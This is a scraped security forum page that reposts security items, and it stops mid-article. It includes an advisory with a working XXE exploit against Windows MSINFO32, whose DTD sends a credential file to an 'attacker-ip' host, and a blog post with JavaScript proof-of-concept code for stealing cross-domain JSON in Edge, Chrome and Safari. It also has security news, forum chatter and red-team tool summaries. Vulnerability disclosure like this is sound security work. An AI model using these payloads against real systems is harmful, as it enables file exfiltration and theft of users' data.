Nytro

[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt [+] ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: ========================== Windows System Information MSINFO32.exe v6.1.7601 Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system components, and software environment. Parameters FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file. Vulnerability Type: =================== XML External Entity CVE Reference: ============== N/A Vulnerability Details: ===================== Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack which can potentially allow remote attackers to gain access to and exfiltrate files from the victims computer if they open a malicious ".nfo" file via remote share / USB etc. Upon open the file user will see error message like "System Information is unable to open this .nfo file. The file might be corrupt etc.. Tested Windows 7 SP1 Exploit code(s): =============== Access and exfiltrate Windows "msdfmap.ini" file as trivial POC. This file contains credentials for MS ADO Remote Data Services. 1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd) 2) "payload.dtd" <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>"> %all; 3) "FindMeThatBiatch.nfo" (corrupt .NFO file) <?xml version="1.0"?> <!DOCTYPE HYP3RLINX [ <!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini"> <!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd"> %dtd;]> <pwn>&send;</pwn> Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32 opens... attacker gets files. OR open via Windows CL: c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo Disclosure Timeline: ====================================== Vendor Notification: September 4, 2016 Vendor Reply "not meet the bar for security servicing": September 7, 2016 December 4, 2016 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ================ High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx Sursa: https://www.exploit-db.com/exploits/40864/

INFILTRATE 2016: Genetic Malware - Travis Morrow / Josh Pitts from Immunity VideosPRO 3 months ago

Hacking is legal again finally (sometimes) BY CAMERON CAMP POSTED 6 DEC 2016 - 02:00PM Go ahead and hack your car, that’s fine now. Go ahead and hack the Department of Defense, that’s okay too under new policies. This doesn’t mean you have a license to do unlimited badness; it means the US authorities have finally become more welcoming to research efforts to uncover bugs that could potentially create holes for the bad guys. You won’t get sued (unless you do something of epic stupidity). It wasn’t always this way. For years, auto enthusiasts have customized their cars for better performance. Nowadays, those same cars are driven by computers that control everything. But until recently, laws technically prohibited them from adjusting fuel management, for example, to increase performance. Why? The manufacturers argued they were hacking software the manufacturers own and that the car owners only have a license to use. It was a sort of DRM (Digital Rights Management) for the car you bought. This meant you may own the car and have a right to modify it, but you couldn’t legally touch the software that ran it all. UNTIL RECENTLY, YOU HAD THE RIGHT TO MODIFY A CAR THAT YOU OWNED, BUT YOU COULDN’T LEGALLY TOUCH THE SOFTWARE THAT RAN IT Not so anymore. This came to a head in recent years when tractor owners attempted to modify the computer software on their high-priced farming machines and fell afoul of the manufacturer’s attorneys. The manufacturer argued the tractor owners only had a license to use under certain conditions, but not to modify. The owners argued the software didn’t do what they wanted, and limited the use of the vehicle they purchased. Some went elsewhere and bought competing equipment. Some kept hacking. It’s hard to imagine a band of rogue farmers slinking around the farm with hacked laptops bent on doing evil deeds though. They just wanted their tractors to work as they thought was necessary. The jumping off point – legally – were laws that sought to keep copyright infringers from stealing works like music. So, too, the automotive manufacturers jumped on the legal bandwagon to hopefully prevent people from modifying their cars and tractors, possibly causing problems. But what applies to music seems clumsy at best when applied to hacking the rest of the software that drives your life (and tractor). But then researchers who were working for the good guys couldn’t really expose flaws without fear of reprisal. By far, the majority of people looking for flaws in their own equipment were not interested in harming their own equipment or themselves. They wanted to improve things. But they also didn’t want to get sued while doing good deeds, so the motivation to help was low. But what about the bad guys? The scammers – an ever-present threat – were free to test as much as they liked. And without researchers trying to help, millions of potential threat vectors wouldn’t be tested or responsibly disclosed, resulting in millions of potential attacks that could hamper devices in droves. Increasingly, progressive software companies welcome researchers, and even add to the interest by offering rewards for willing researchers bent on uncovering flaws. These “bug bounty” programs have been amazingly successful, sometimes helping the software companies uncover hundreds of flaws before they are exploited. Not so much with the car manufacturers. Until now, you were unlikely to receive a warm welcome if you reported a flaw in the software that runs your car, and you just might get a legal letter. But now some manufacturers are relaxing that approach by rolling out bug submission processes. Basically, companies like General Motors are now enlisting your help as a researcher. That’s great news for us all. Hacking the Fed If you were nervous about hacking your car, you were mortified to hack the U.S. Government (unless you’re a scammer, then it might be your day job). Auto manufacturers might send nasty letters, but probably not black vans to haul you off. Not so with the government. Notoriously devoid of a sense of humor, the fed doesn’t take kindly to exploit attempts which you feel are really interesting and novel. Until now. Seemingly, the bug bounty wisdom has shined its light on the Fed. What’s the result? If you abide by their rules of engagement, you can fix holes for the greater good that will help protect us all. That’s not to say their efforts are perfect, and you should just go nuts and port scan the whole government and start hammering, but if you exercise some modicum of common sense (and maybe read the rules of engagement), they want to hear from you. The U.S. Army does too. Seems the word is getting around that not only can this help to keep us all safe, you may also show up on their radar as a researcher interested in helping the Army, and not ending up in the crosshairs of a very large adversary in the process. It’s a welcome respite from the draconian views of only a few years ago, when it felt like taking your life in your own hands if you endeavored to explore the world for vulnerabilities and report them. How’s it working? At least one auto manufacturer is reporting hundreds of flaws discovered, which they then can fix, and all without hiring a raft of expensive (and difficult to find and hire) researchers. Is it a perfect system? No. But nothing is. It is, however, a good start and a nice gesture to the community. So now you can come clean about hacking your car, even if it runs much worse since you started. Sursa: http://www.welivesecurity.com/2016/12/06/hacking-legal-finally-sometimes/

[Video] How to Hack a Credit Card in 6 Seconds, Experts Reveal Monday, December 05, 2016 Swati Khandelwal As India attempts an upgrade to a cashless society, cyber security experts have raised serious concerns and revealed how to find credit card information – including expiration dates and CVV numbers – in just 6 Seconds. And what's more interesting? The hack uses nothing more than guesswork by querying multiple e-commerce sites. In a new research paper entitled "Does The Online Card Payment Landscape Unwittingly Facilitate Fraud?" published in the academic journal IEEE Security & Privacy, researchers from the University of Newcastle explains how online payments remain a weak spot in the credit card security which makes it easy for fraudsters to retrieve sensitive card information. The technique, dubbed Distributed Guessing Attack, can circumvent all the security features put in place to protect online payments from fraud. The similar technique is believed to be responsible for the hack of thousands of Tesco customers in the U.K last month. The issue relies on the Visa payment system, where an attacker can guess and attempt all possible permutations and combinations of expiration dates and CVV numbers on hundreds of websites. Researchers discovered two weaknesses in the way online transactions are verified using the Visa payment system. They are as follows: Online payment systems do not detect multiple incorrect payment requests if they're performed across multiple sites. They also allow a maximum of 20 attempts per card on each site. Web sites do not run checks regularly, varying the card information requested. Newcastle University PhD candidate Mohammed Ali says neither weakness is alone too severe, but when used together and exploited properly, a cyber criminal can recover a credit card's security information in just 6 seconds, presenting "a serious risk to the whole payment system." Here's how the attack works: The attack is nothing but a very clever brute force attack that works against some of the most popular e-commerce sites. So, instead of brute-forcing just one retailer's website that could trigger a fraud detection system due to incorrect guesses or lock the card, the researchers spread out guesses for the card's CVC number across multiple sites with each attempt narrowing the possible combinations until a valid expiration dates and CVV numbers are determined. The video demonstration shows that it only takes 6 seconds for a specially designed tool to reveal a card's secure code. First, an attacker needs a card's 16-digit number, which can be obtained either from black-market websites for less than $1, or from a smartphone equipped with a near-field communication (NFC) reader to skim them. Once a valid 16-digit number is obtained, the hacker use web bots to brute force three-digit card verification value (or CVV) and expiration date to hundreds of retailers at once. The CVV takes a maximum of 1,000 guesses to crack it and the expiry date takes no more than 60 attempts. The bots then work to obtain the billing address, if required. The paper suggests the whole attack can be carried out in just 6 seconds. "These experiments have also shown that it is possible to run multiple bots at the same time on hundreds of payment sites without triggering any alarms in the payment system," researchers explain in the paper. "Combining that knowledge with the fact that an online payment request typically gets authorized within two seconds makes the attack viable and scalable in real time. As an illustration, with the website bot configured cleverly to run on 30 sites, an attacker can obtain the correct information within four seconds." The attack works against Visa card customers, as the company does not detect multiple attempts to use a card across its network, while MasterCard detects the brute force attack after fewer than 10 attempts, even when the guesses are spread across multiple websites. How to Protect yourself? The team investigated the Alexa top-400 online merchants’ payment websites and found that the current payment platform facilitates the distributed guessing attack. The researchers contacted the 36 biggest websites against which they ran their distributed card number-guessing attack and notified them of their findings. As a result of the disclosure, eight sites have already changed their security systems to thwart the attacks. However, the other 28 websites made no changes despite the disclosure. For Visa, the best way to thwart the distributed card number-guessing attack is to adopt a similar approach to MasterCard and lock a card when someone tries to guess card details multiple times, even tried across multiple websites. For customers, avoid using Visa credit or debit cards for making online payments, always keep an eye on your statements, and keep spending limit on your Visa card as low as possible. Sursa: https://thehackernews.com/2016/12/credit-card-hacking-software_5.html

Expedia IT guy made $300,000 by hacking own execs by Matt Egan @mattmegan5December 6, 2016: 8:25 AM ET Watch this hacker break into a company A former Expedia IT professional admitted on Monday to illegally trading on secrets he discovered by hacking his own company's senior executives. Jonathan Ly stole passwords and infiltrated devices of Expedia's (EXPE) chief financial officer and head of investor relations, allowing him to make a series of "highly profitable" trades in stock options that scored him $331,000, according to prosecutors. Ly, a senior IT technician in Expedia's Hotwire.com division, pleaded guilty to securities fraud in U.S. District Court in Seattle. The 28-year-old will have to repay the illegal profits he made from insider trading. Prosecutors say that between 2013 and 2016, Ly exploited his ability to remotely access electronic devices used by Expedia execs to access documents and emails containing confidential information. For instance, the SEC said Ly targeted information prepared by Expedia's head of investor relations summarizing how the market may react to certain announcements. Access to that kind of secret info before it's publicly released can be very valuable, given how news can cause stocks to move dramatically. U.S. Attorney Annette Hayes said in a statement that an FBI investigation revealed that Ly "used his employer's networks to facilitate a get-rich-quick scheme." Ly's lawyer, John Runfola, said his client is "deeply sorry" and noted that he is a young man who came from an "impoverished background." "He has certainly learned his lesson," Runfola told CNNMoney. According to the authorities, the insider trading scheme continued even after he left Expedia last year. They say Ly kept an Expedia laptop without the knowledge of his company and continued to access devices and email accounts used by senior company execs to trade. Prosecutors say Ly even made it appear that other Expedia employees were the ones using the devices. Ly faces potential jail time as securities fraud is punishable by up to 25 years in prison and a $250,000 fine. He is scheduled to be sentenced on February 28, 2017. Hayes said Expedia quickly contacted the FBI when it discovered the scheme. Expedia said in a statement to CNNMoney that it detected the intrusion by using "enhanced monitoring practices we had in place." The company said it "worked closely with law enforcement authorities to identify, track pursue and put a halt to these activities." Ly has agreed to repay Expedia for the $81,592 the company spent investigating the computer intrusion. The SEC settlement, subject to court approval, requires Ly to pay $375,907, including interest. Jay Tabb Jr., the FBI special agent in charge, said this case was "particularly egregious" because Ly violated the "trust of the public" as well as "violated the privacy of fellow employees." CNNMoney (New York)First published December 5, 2016: 4:51 PM ET Sursa: http://money.cnn.com/2016/12/05/technology/expedia-hack-insider-trading-sec/index.html

Linux Fundamentals Paul Cobbaut Publication date 2015-05-24 CEST Abstract This book is meant to be used in an instructor-led training. For self-study, the intent is to read this book next to a working Linux computer so you can immediately do every subject, practicing each command. This book is aimed at novice Linux system administrators (and might be interesting and useful for home users that want to know a bit more about their Linux system). However, this book is not meant as an introduction to Linux desktop applications like text editors, browsers, mail clients, multimedia or office applications. More information and free .pdf available at http://linux-training.be . Download: http://linux-training.be/linuxfun.pdf

Exploiting 64-bit IE on Windows 8.1 – The Pwn2Own Case Study - Presented By Yuki Chen and Linan Hao

Am facut update la 4.1.17: https://invisionpower.com/release-notes/ Postati aici daca sunt probleme. Pana acum au fost, de aceea nu merge forumul.

Vezi astea: - http://www.macworld.co.uk/how-to/iosapps/how-downgrade-ios-10-how-go-back-ios-9-reinstall-ios-9-3522302/ - http://www.howtogeek.com/230144/how-to-downgrade-to-an-older-version-of-ios-on-an-iphone-or-ipad/ - https://fieldguide.gizmodo.com/how-to-downgrade-ios-9-3-to-an-older-version-1767689167 PS: Nu am incercat dar e posibil sa incerc (daca e nevoie, sper sa nu fie) saptamana viitoare.

E normal, va apare template-ul pana se fac request-urile care sa obtina datele. @Gecko poti pune un "Loading" ceva, generic, pe toata pagina, pana se incarca?

Nu stiu ce e cu acel site

Cate ceva legat de vulnerabilitatile web "clasice", am scris eu acum multi ani, poate iti e util: http://dgaspcsm.ro/Vulnerabilitati Web si securizarea.pdf Pentru altele, vezi OWASP Testing Guide.

Da, exemplu clasic de "PE Backdoor", a uitat insa sa faca "Realign PE Header" (Nr. of Section, Size of code... o sa difere), insa functioneaza.

Epic!

A incerca cineva 3.4? Merge? Folositi o masina virtuala pentru teste.

I checked the code (not really in detail) and it looks like this: - It unloads the VirtualBox driver if it is already running - It loads a vulnerable VirtualBox driver -> WHICH IS SIGNED AND ALLOWED TO RUN (if you Download this https://github.com/hfiref0x/TDL/blob/master/Source/Furutaka/drv/vboxdrv_exploitable.sys and check it's properties you can see this) - Exploit a vulnerability in the vulnerable driver - Execute a shellcode in the kernel-context -> Here you are able to load (minimal) another kernel module This is the bypass of the "Driver Signature Enforcement" avoiding the PatchGuard (as DSEFix would trigger). I am not really sure what I say is true, if I will have some time, I will take a more detailed look.

Nu folositi mizeria de Bundle (Firefox).

Last useful stuff I saw on this subject was this one: http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html And you should also check this: https://github.com/hfiref0x/TDL However, I think they are working from time to time on this, so even if some bypasses are found, they are "probably" fixed. Also, you should take in consideration from here: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/driver-signing Note Windows 10 for desktop editions (Home, Pro, Enterprise, and Education) and Windows Server 2016 kernel-mode drivers must be signed by the Windows Hardware Dev Center Dashboard, which requires an EV certificate. For details, see Driver Signing Changes in Windows 10. Also, check this: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later- Tools: https://github.com/tandasat/PgResarch and https://github.com/tandasat/findpg

DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigation and perform incident response. DFF follows three main goals : Modularity In contrary to the monolithic model, the modular model is based on a core and many modules. This modular conception presents two advantages : it permits to improve rapidly the software and to split easily tasks for developers. Scriptability It is obvious that the ability to be scripted gives more flexibility to a tool, but it also enables automation and gives the possibility to extend features Genericity the project tries to remain Operating System agnostic. We want to help people where they are ! Letting them choose any Operating System to use DFF. Amongst supported features of DFF : Automated analysis Mount partitions, file systems and extract files metadata and other usefull information in an automated way. Generate an HTML report with System & User activity Direct devices reading support Supported forensic image file formats AFF, E01, Ex01, L01, Lx01, dd, raw, bin, img Supported volumes & File systems with unallocated space, deleted items, slack space, ... DOS, GPT, VMDK, Volume Shadow Copy, NTFS, HFS+, HFSX, EXT2, EXT3, EXT4, FAT12, FAT16, FAT32 Embeded viewers for videos, images, pdf, text, office documents, registry, evt, evtx, sqlite, ... Outlook and Echange mailboxes (PAB, PST, OST) Metadata extraction Compound files (Word, Excel, Powerpoint, MSI, ...) Windows Prefetch Exif information LNK Browser history Firefox, Chrome, Opera System & Users activity connected devices, user accounts, recent documents, installed software, network, ... Volatile memory analysis with graphical interface to Volatility Videos thumbnails generation Support for Sqlite, Windows Registry, Evt and Evtx Full Skype analysis (Sqlite and old DDB format) Timeline based on all gathered timestamps (file systems and metadata) Hashset supports with automatic "known bad", "known good" tagging Mount functionnality to access recovered files and folders from your local system In place carving ... Sursa: https://github.com/arxsys/dff

Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps. Description Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like "drozer" that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent. Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device. Needle is open source software, maintained by MWR InfoSecurity. Link: https://github.com/mwrlabs/needle

hunter (l)user hunter using WinAPI calls only Introduction: During Red Team engagments it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user (no matter how, always "assume compromise") in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he is a local administrator in any box, to which groups he belongs, if he has access to file shares, and so on. Enumerating hosts, users, and groups will also help to get a better understanding of the Domain layout. You might be thinking, "use Powerview". Lately, one of the most common problems I encounter during Red Team exercises is the fact that PowerShell is heavily monitored. If you use it, you'll get caught, sooner or later. By now everyone is well aware how powerfull PowerShell is, including Blue Teams and Security Vendors. There are multiple ways to work around this. To avoid using multiple old school tools (psloggedon.exe, netsess.exe, nltest, netview, among others) and to reduce the amount of tools uploaded to compromised systems I created a simple tool that doesn't require Administrative privileges to run and collect the information listed below, and relies only on the Windows API. You might end up dealing with white list bypass and process evasion, but I'll leave that for another day. Link: https://github.com/fdiskyou/hunter

BSLV16 BSidesLV 77 videos 446 views Last updated on Nov 17, 2016 Opening Keynote Pt. I & II - Lorrie Cranor-FTC, Michael Kaiser-NCSA by BSidesLV 36:18 Network Access Control: The Company-Wide Team Building Exercise That Only You Know About - Dean Webb by BSidesLV 26:27 Managing Security with the OWASP Assimilation Project - Alan Robertson by BSidesLV 40:17 Toward Better Password Requirements - Jim Fenton by BSidesLV 56:33 Data Science or Data Pseudo-Science? - Ken Westin by BSidesLV 41:51 I Am The Cavalry (IATC) Introduction and Overview - Joshua Corman by BSidesLV 23:33 Shall We Play a Game? 30 Years of the CFAA - Leonard Bailey, Jen Ellis by BSidesLV 1:28:31 Calling All Hacker Heroes: Go Above And Beyond - Keren Elazari by BSidesLV 29:19 Intro to Storage Security, Looking Past the Server - Jarett Kulm by BSidesLV 24:47 Are You a PenTexter? - Peter Mosmans, Melanie Rieback by BSidesLV 43:41 Deep Adversarial Architectures for Detecting *and Generating) Maliciousness - Hyrum Anderson by BSidesLV 39:09 I Am The Cavalry Panel: Progress on Cyber Safety by BSidesLV 35:50 Welcome to The World of Yesterday, Tomorrow! - Joel Cardella by BSidesLV 46:46 Breaking the Payment Points of Interaction (POI) - Nir Valtman, Patrick Watson by BSidesLV 49:06 Cyber Safety And Public Policy - I Am The Cavalry, Amanda Craig, Jen Ellis by BSidesLV 55:23 Security Vulnerabilities, the Current State of Consumer Protection Law, & How IOT Might Change It by BSidesLV 23:07 How to Get and Maintain your Compliance without ticking everyone off - Rob Carson by BSidesLV 23:13 What we've learned with Two-Secret Key Derivation - Jeffrey Goldberg, Julie Haugh by BSidesLV 35:32 Exposing the Neutrino EK: All the Naughty Bits - Ryan Chapman by BSidesLV 55:08 State Of Healthcare Cyber Safety - Christian Dameff, Colin Morgan, Suzanne Schwartz, BeauWoods by BSidesLV 56:46 State Of Automotive Cyber Safety - IATC - Joshua Corman by BSidesLV 48:53 DNS Hardening - Proactive Net Sec Using F5 iRules and Open Source Analysis Tools - Jim Nitterauer by BSidesLV 25:44 Defeating Machine Learning: Systemic Deficiencies for Detecting Malware by BSidesLV 45:14 Beyond the Tip of the IceBerg - Fuzzing Binary Protocol for Deeper Code Coverage by BSidesLV 46:23 CFPs 101 - Tottenkoph, Guy McDudefella, Security Moey, David Mortman by BSidesLV 47:56 Operation Escalation: How Commodity programs Are Evolving Into Advanced Threats by BSidesLV 52:51 Evaluating a password manager - Evan Johnson by BSidesLV 31:26 Why does everyone want to kill my passwords? - Mark Burnett by BSidesLV 32:11 How to make sure your data science isn't vulnerable to attack - Leila Powell by BSidesLV 57:19 DYODE: Do Your Own DiodE for Industrial Control Systems - AryKokos, Arnaud Soullie by BSidesLV 43:10 Ingress Egress: The emerging threats posed by augmented reality gaming - Andrew Brandt by BSidesLV 1:00:45 Ground Truth Keynote: Great Disasters of Machine Learning - Davi Ottenheimer by BSidesLV 32:23 IATC Day 2: Introduction and Overview - Joshua Corman, Beau Woods by BSidesLV 12:44 Mapping the Human Attack Surface - Louis DiValentin (Master Chen) by BSidesLV 26:19 Don't Repeat Yourself: Automating Malware Incident Response for Fun and Profit - Kuba Sendor by BSidesLV 29:57 Crafting tailored wordlists with Wordsmith - Sanjiv Kawa, Tom Porter by BSidesLV 47:07 Hunting high-value targets in corporate networks - Patrick Fussell, Josh Stone by BSidesLV 39:07 A Noobs Intro Into Biohacking, Grinding, DIY Body Augmentation - Doug Copeland by BSidesLV 23:19 No Silver Bullet, Multi contextual threat detection via Machine Learning - Rod Soto, Joseph Zadeh by BSidesLV 52:34 Stop the Insanity and Improve Humanity: UX for the Win - Robin Burkett by BSidesLV 26:10 Powershell-Fu - Hunting on the Endpoint - Chris Gerritz by BSidesLV 27:38 Labeling the VirusShare Corpus: Lessons Learned - John Seymour by BSidesLV 30:21 There is no security without privacy - Craig Cunningham by BSidesLV 30:35 Survey says…Making progress in the Vulnerability Disclosure Debate - Allan Friedman by BSidesLV 1:27:38 Domains of Grays - Eric Rand by BSidesLV 38:29 Automated Dorking for Fun and Pr^wSalary - Filip Reesalu by BSidesLV 13:17 [Private Video] You Don't See Me - Abusing Whitelists to Hide and Run Malware - Michael Spaling by BSidesLV 28:29 Six Degrees of Domain Admin... - Andy Robbins, Will Schroeder, Rohan Vazarkar by BSidesLV 51:51 Uncomfortable Approaches - Joshua Corman, Beau Woods by BSidesLV 45:37 Latest evasion techniques in fileless malware - fl3uryz & Andrew Hay by BSidesLV 26:37 PLC for Home Automation and How It Is as Hackable as a Honeypot - Philippe Lin & Scott Erven by BSidesLV 16:22 CyPSA Cyber Physical Situational Awareness - Kate Davis, Edmond Rogers by BSidesLV 41:12 Hacking Megatouch Bartop Games - Mark Baseggio by BSidesLV 34:54 Passphrases for Humans: A Cultural Approach to Passphrase Wordlist Generation by BSidesLV 58:58 Is that a penguin in my Windows? - Spencer McIntyre by BSidesLV 39:48 Automation Plumbing - Ashley Holtz & Kyle Maxwell by BSidesLV 25:06 Disclosing Passwords Hashing Policies - Michal Spacek by BSidesLV 33:12 PAL is your pal: Bootstrapping secrets in Docker - Nick Sullivan by BSidesLV 51:00 Dominating the DBIR Data - Anastasia Atanasoff, Gabriel Bassett by BSidesLV 56:15 An Evolving Era of Botnet Empires - Andrea Scarfo by BSidesLV 28:28 Building an EmPyre with Python - Steve Borosh Alexander Rymdeko-Harvey, Will Schroeder by BSidesLV 50:19 Scalability: Not as Easy as it SIEMs - Keith Kraus & grecs by BSidesLV 22:38 Ethical implications of In-Home Robots - Guy McDudefella, Brittany Postnikoff by BSidesLV 47:31 The Deal with Password Alternatives - Terry Gold by BSidesLV 55:15 QUESTIONING 42: Where is the "engineering" in the Social Engineering of Namespace Compromises? by BSidesLV 1:04:23 Cross-platform Compatibility: Bringing InfoSec Skills into the World of Computational Biology by BSidesLV 31:27 One Compromise to Rule Them All - Bryce Kunz by BSidesLV 53:00 The Future of Bsides - Panel Session by BSidesLV 52:46 What's Up Argon2? The Password Hasing Winner A Year Later - JP Aumasson by BSidesLV 24:59 Rock Salt: A Method for Securely Storing and Utilizing Password Validation Data by BSidesLV 42:58 I Love my BFF (Brute Force Framework) - Kirk Hayes by BSidesLV 24:06 Proactive Password Leak Processing - Bruce Marshall by BSidesLV Cruise Line Security Assessment OR Hacking the High Seas - Chad Dewey (Adam Brand) by BSidesLV 22:21 Automation of Penetration Testing and the future - Haydn Johnson (Kevin Riggins) by BSidesLV 25:20 Pushing Security from the Outside - Kat Sweet, Chris DeWeese by BSidesLV 26:19 Why it's all snake oil - and that may be ok - Andrew Morris by BSidesLV 46:44 Link: https://www.youtube.com/playlist?list=PLjpIlpOLoRNTG3td7JfV1LDinNFLSHJqM

Friday, November 25, 2016 JSON hijacking for the modern web Benjamin Dumke-von der Ehe found an interesting way to steal data cross domain. Using JS proxies he was able to create a handler that could steal undefined JavaScript variables. This issue seems to be patched well in Firefox however I found a new way to enable the attack on Edge. Although Edge seems to prevent assignments to window.__proto__ they forgot about Object.setPrototypeOf. Using this method we can overwrite the __proto__ property with a proxied __proto__. Like so: <script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name); } })); </script> <script src="external-script-with-undefined-variable"></script> <!-- script contains: stealme --> Edge PoC stealing undefined variable If you include a cross domain script with stealme in, you will see it alerts the value even though it's an undefined variable. After further testing I found you can achieve the same thing overwriting __proto__.__proto__ which is [object EventTargetPrototype] on edge. <script> __proto__.__proto__=new Proxy(__proto__,{ has:function(target,name){ alert(name); } }); </script> <script src="external-script-with-undefined-variable"></script> Edge PoC stealing undefined variable method 2 Great so we can steal data x-domain but what else can we do? All major browsers support the charset attribute on script, I found that the UTF-16BE charset was particularly interesting. UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going? Lets say we have a response from the web server that returns an array literal and we can control some of it. We can make the array literal an undefined JavaScript variable with a UTF-16BE charset and steal it using the technique above. The only caveat is that the resulting characters when combined must form a valid JavaScript variable. For example let's take a look at the following response: ["supersecret","input here"] To steal supersecret we need to inject a NULL character followed by two a's, for some reason Edge doesn't treat it as UTF-16BE unless it has those injected characters. Maybe it's doing some sort of charset sniffing or maybe it's truncating the response and the characters after NULL are not a valid JS variable on Edge I'm not sure but in my tests it seems to require a NULL and padded out with some characters. See below for an example: <!doctype HTML> <script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } })); </script> <script charset="UTF-16BE" src="external-script-with-array-literal"></script> <!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] --> Edge PoC stealing JSON feeds So we proxy the __proto__ property as before, include the script with a UTF-16BE charset and the response contains a NULL followed by two a's in the second element of the array literal. I then decode the UTF-16BE encoded string by bit shifting by 8 to obtain the first byte and bitwise AND to obtain the second byte. The result is an alert popup of ["supersecret"," as you can see Edge seems to truncate the response after the NULL. Note this attack is fairly limited because many characters when combined do not produce a valid JavaScript variable. However it may be useful to steal small amounts of data. Stealing JSON feeds in Chrome It gets worse. Chrome is far more liberal with scripts that have a exotic charset. You don't need to control any of the response in order for Chrome to use the charset. The only requirement is that as before the characters combined together produce a valid JavaScript variable. In order to exploit this "feature" we need another undefined variable leak. At first glance Chrome appears to have prevented overwriting the __proto__ however they forgot how deep the __proto__ goes... <script> __proto__.__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{ has:function f(target,name){ var str = f.caller.toString(); alert(str.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } }); </script> <script charset="UTF-16BE" src="external-script-with-array-literal"></script> <!-- script contains the following response: ["supersecret","abc"] --> NOTE: This was fixed in Chrome 54 Chrome PoC stealing JSON feeds works in version 53 We go 5 levels deep down the __proto__ chain and overwrite it with our proxy, then what happens next is interesting, although the name argument doesn't contain our undefined variable the caller of our function does! It returns a function with our variable name! Obviously encoded in UTF-16BE, it looks like this: function 嬢獵灥牳散牥琢Ⱒ慢挢崊 Waaahat? So our variable is leaking in the caller. You have to call the toString method of the function in order to get access to the data otherwise Chrome throws a generic exception. I tried to exploit this further by checking the constructor of the function to see if it returns a different domain (maybe Chrome extension context). When adblock plus was enabled I saw some extension code using this method but was unable to exploit it since it appeared to be just code injecting into the current document. In my tests I was also able to include xml or HTML data cross domain even with text/html content type which makes this a pretty serious information disclosure. This vulnerability has now been patched in Chrome. Stealing JSON feeds in Safari We can also easily do the same thing in the latest version of Safari. We just need to use one less proto and use "name" from the proxy instead of the caller. <script> __proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{ has:function f(target,name){ alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } }); </script> Safari PoC stealing JSON feeds After further testing I found Safari is vulnerable to the same issue as Edge and only requires __proto__.__proto__. Hacking JSON feeds without JS proxies I mentioned that the UTF-16BE charset works in every major browser, how can you hack JSON feeds without JS proxies? First you need to control some of the data and the feed has to be constructed in such a way that it produces a valid JavaScript variable. To get the first part of the JSON feed before your injected data is pretty easy, all you do is output a UTF-16BE encoded string which assigns the non-ASCII variable to a specific value and then loop through the window and check if this value exists then the property name will contain all the JSON feed before your injection. The code looks like this: =1337;for(i in window)if(window[i]===1337)alert(i) This code is then encoded as a UTF-16BE string so we actually get the code instead of a non-ASCII variable. In effect this means just padding each character with a NULL. To get the characters after the injected string I simply use the increment operator and make the encoded string after a property of window. Then we call setTimeout and loop through the window again but this time checking for NaN which will have a variable name of our encoded string. See below: setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i);}))}catch(e){}}});++window.a I've wrapped it in a try catch because on IE window.external will throw an exception when checked with isNaN. The whole JSON feed will look like this: {"abc":"abcdsssdfsfds","a":"<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}));setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}))}catch(e){}}});++window.", "UTF-16BE")?>a":"dasfdasdf"} Hacking JSON 